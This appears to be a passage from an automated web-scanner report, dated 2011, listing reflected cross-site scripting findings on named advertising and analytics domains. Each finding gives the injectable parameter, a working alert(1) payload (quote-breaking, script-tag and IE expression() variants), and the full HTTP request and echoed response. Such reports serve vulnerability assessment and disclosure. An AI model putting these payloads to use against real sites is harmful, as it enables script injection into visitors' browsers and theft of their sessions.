http://www.omniture.com/en/products/conversion/testandtarget User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Content-Length: 187 Date: Tue, 26 Apr 2011 21:04:00 GMT Server: Test & Target
if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get('default').get('SiteCatalyst: event', 0d3c5f<script>alert(1)</script>9584e60e0db).setOffer(new mboxOfferDefault()).loaded();}
The value of the px request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 33802'%3balert(1)//c94ddc006d4 was submitted in the px parameter. This input was echoed as 33802';alert(1)//c94ddc006d4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bht/?px=2033802'%3balert(1)//c94ddc006d4&v=1&rnd=1303843577231 HTTP/1.1 Host: p.opt.fimserve.com Proxy-Connection: keep-alive Referer: http://fls.doubleclick.net/activityi;src=1676624;type=count339;cat=landi852;u2=14610_0957_9_95;u4=38954353;u5=;u6=;u7=;ord=1;num=4579132553189.993? User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/html;charset=ISO-8859-1 Content-Length: 96 Date: Tue, 26 Apr 2011 18:46:49 GMT
var error='java.lang.NumberFormatException: For input string: "2033802';alert(1)//c94ddc006d4"';
The value of the name request parameter is copied into the HTML document as plain text between tags. The payload 78020<x%20style%3dx%3aexpression(alert(1))>7f33d133aba was submitted in the name parameter. This input was echoed as 78020<x style=x:expression(alert(1))>7f33d133aba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bf287%3balert(1)//f83feec8c47 was submitted in the jscallback parameter. This input was echoed as bf287;alert(1)//f83feec8c47 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /al.asp?ts=20110426184640&cc=us&hk=1&ipid=20029&mh=bd3142edfc2bce02d9fc379eee21c2c1&pvm=f67439ad677e2c9299a82dfc253295cd&pvu=014CCF305AC145B7BA348BA3CAACA02D&rcc=us&so=0&prf=ll%3A19249%7Cintl%3A41679%7Cpreprochrome%3A308%7Cgetconchrome%3A237%7Cadvint%3A42259%7Cadvl%3A42259%7Ctl%3A42259&jscallback=$iTXT.js.callback1bf287%3balert(1)//f83feec8c47 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:47:18 GMT; Path=/ Content-Type: text/javascript Content-Length: 65 Date: Tue, 26 Apr 2011 18:47:18 GMT Age: 0 Connection: keep-alive
5.163. http://realestate.msn.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://realestate.msn.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7366'-alert(1)-'b7e52cebacd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /intellitxt/front.asp?ipid=20029&f7366'-alert(1)-'b7e52cebacd=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgEAAAEvki8pzwA-
Response
HTTP/1.1 200 OK P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3AA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyHm3QA-; Domain=.intellitxt.com; Expires=Sat, 25-Jun-2011 18:46:03 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:46:03 GMT Age: 0 Connection: keep-alive Content-Length: 11116
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... tp://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=20000&c4=&c5=&c6=&c15=&cv=1.3&cj=1&rn=20110426184603";})();$iTXT.js.serverUrl='http://realestate.msn.us.intellitxt.com';$iTXT.js.pageQuery='ipid=20029&f7366'-alert(1)-'b7e52cebacd=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9c51d%3balert(1)//8c141cbb073 was submitted in the jscallback parameter. This input was echoed as 9c51d;alert(1)//8c141cbb073 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback09c51d%3balert(1)//8c141cbb073 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:45 GMT Age: 0 Connection: keep-alive Content-Length: 7166
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback09c51d;alert(1)//8c141cbb073({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
5.165. http://realestate.msn.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://realestate.msn.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4bd9"-alert(1)-"7a83dccfee2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /v4/init?ts=1303843577474&pagecl=37902&fv=10&muid=&refurl=http%3A%2F%2Frealestate.msn.com%2Farticle.aspx%3Fcp-documentid%3D28280145&ipid=20029&jscallback=$iTXT.js.callback0&a4bd9"-alert(1)-"7a83dccfee2=1 HTTP/1.1 Host: realestate.msn.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://realestate.msn.com/article.aspx?cp-documentid=28280145 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX=AQAAAAQAAArJAQAAAAEAAAEvki9eGgAACucBAAAAAQAAAS+SL14aAAAK1QEAAAABAAABL5IvXhoAAArHAQAAAAEAAAEvki9eGgAAAAD9SQn+; VM_USR=AArNPECOHUvQr+aEbt9FOpIAADrpAAA7LgIAAAEvkyGmjQA-
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Tue, 26 Apr 2011 18:47:55 GMT Age: 0 Connection: keep-alive Content-Length: 7147
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... illa/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","a4bd9"-alert(1)-"7a83dccfee2":"1","reg":"tx","refurl":"http://realestate.msn.com/article.aspx?cp-documentid\u003d28280145","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iT ...[SNIP]...
The value of the ctp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6b87'%3balert(1)//32ed94e5709 was submitted in the ctp parameter. This input was echoed as d6b87';alert(1)//32ed94e5709 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /rrserver/p13n_generated.js?a=756bd9ec9a083c52&ts=1303848188756&pt=%7Ccategory_page.bottom&u=%7B71c28bcc-895f-4239-9850-58ed6aba178d%7D&s=bijb1vookoje2tnvwh5oouwn&ctp=%7C0%3Apromcode%253D600582C43552%7C1%3Apromtype%253Dinternald6b87'%3balert(1)//32ed94e5709&l=1 HTTP/1.1 Host: recs.richrelevance.com Proxy-Connection: keep-alive Referer: http://west.thomson.com/default.aspx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
function rrAttrib(linkurl){ var rrcart_img = new Image(); rrcart_img.src= linkurl;}var rr_recs={placements:[{used:false,placementType:'category_page.bottom',html:'<div class="r3_recommendations"><div ...[SNIP]... <a href="http://west.thomson.com/store/AddItem.aspx?Product_id=162495&MaterialNumber=22061301&Product_type=1&promcode=600582C43552&promtype=internald6b87';alert(1)//32ed94e5709"> ...[SNIP]...
The value of the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 786bc"-alert(1)-"2db9af1c3c0 was submitted in the 94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061003 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=786bc"-alert(1)-"2db9af1c3c0&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cachebuster request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd9e"-alert(1)-"1376e3d3251 was submitted in the cachebuster parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:40 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.62648372353fd9e"-alert(1)-"1376e3d3251"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftadz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71dab"-alert(1)-"4addb22c6fd was submitted in the ftadz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:19 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=71dab"-alert(1)-"4addb22c6fd&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftscw request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload af48e"-alert(1)-"d29e837d092 was submitted in the ftscw parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:30 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061005 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=af48e"-alert(1)-"d29e837d092&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the ftx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5368a"-alert(1)-"128e10b5eda was submitted in the ftx parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:40:51 GMT Server: Jetty(6.1.22) Cache-Control: no-cache, no-store Content-Length: 464 content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061006 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=5368a"-alert(1)-"128e10b5eda&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the fty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84b00"-alert(1)-"cac21056698 was submitted in the fty parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:07 GMT Server: Jetty(6.1.22) Content-Length: 464 Cache-Control: no-cache, no-store content-type: text/javascript pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Via: 1.1 mdw061001 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=84b00"-alert(1)-"cac21056698&ftadz=&ftscw=&cachebuster=602976.6264837235"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
5.173. http://servedby.flashtalking.com/imp/3/14752 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://servedby.flashtalking.com
Path:
/imp/3/14752
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be3a7"-alert(1)-"c5145c4eafe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imp/3/14752;94537;201;js;MSN;ADVMSNMSNMoneyInvestingHomepageRMBanner300x250CPM/?click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1 HTTP/1.1 Host: servedby.flashtalking.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: flashtalkingad1="GUID=1210EC55BB9841"
Response
HTTP/1.1 200 OK Date: Tue, 26 Apr 2011 18:41:45 GMT Server: Jetty(6.1.22) P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/javascript Cache-Control: no-cache, no-store pragma: no-cache Content-Length: 467 Via: 1.1 mdw061008 (MII-APC/1.6)
var ftGUID_94537="1210EC55BB9841"; var ftConfID_94537="0"; var ftParams_94537="click=&ftx=&fty=&ftadz=&ftscw=&cachebuster=602976.6264837235&be3a7"-alert(1)-"c5145c4eafe=1"; var ftKeyword_94537=""; var ftSegment_94537=""; var ftSegmentList_94537=[]; var ftRuleMatch_94537="0";
The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 9663e<script>alert(1)</script>4a63942b3e0 was submitted in the cb parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /api/getApi.php?return=json&url=http%3A%2F%2Fwww.computerworlduk.com%2Fnews%2Fsecurity%2F3276305%2Foracle-responds-to-hacker-group-and-patches-javacom-vulnerability%2F%3Folo%3Drss&fpc=8f316ea-12f93c9a01d-4bc8d0c8-1&cb=initWidgetOnSuccess9663e<script>alert(1)</script>4a63942b3e0&service=initWidget HTTP/1.1 Host: wd.sharethis.com Proxy-Connection: keep-alive Referer: http://edge.sharethis.com/share4x/index.1f60cca3a67f69342fce2ed55af68ca9.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1; __uset=yes
The value of the FindingMethod request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 970be"style%3d"x%3aexpression(alert(1))"b6e0c02100b was submitted in the FindingMethod parameter. This input was echoed as 970be"style="x:expression(alert(1))"b6e0c02100b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the FindingMethod request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b99"%3balert(1)//ee36c302041 was submitted in the FindingMethod parameter. This input was echoed as c3b99";alert(1)//ee36c302041 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the PromCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a66"style%3d"x%3aexpression(alert(1))"2617e1b896b was submitted in the PromCode parameter. This input was echoed as a8a66"style="x:expression(alert(1))"2617e1b896b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the PromCode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbbd9"%3balert(1)//e1045719b6a was submitted in the PromCode parameter. This input was echoed as cbbd9";alert(1)//e1045719b6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
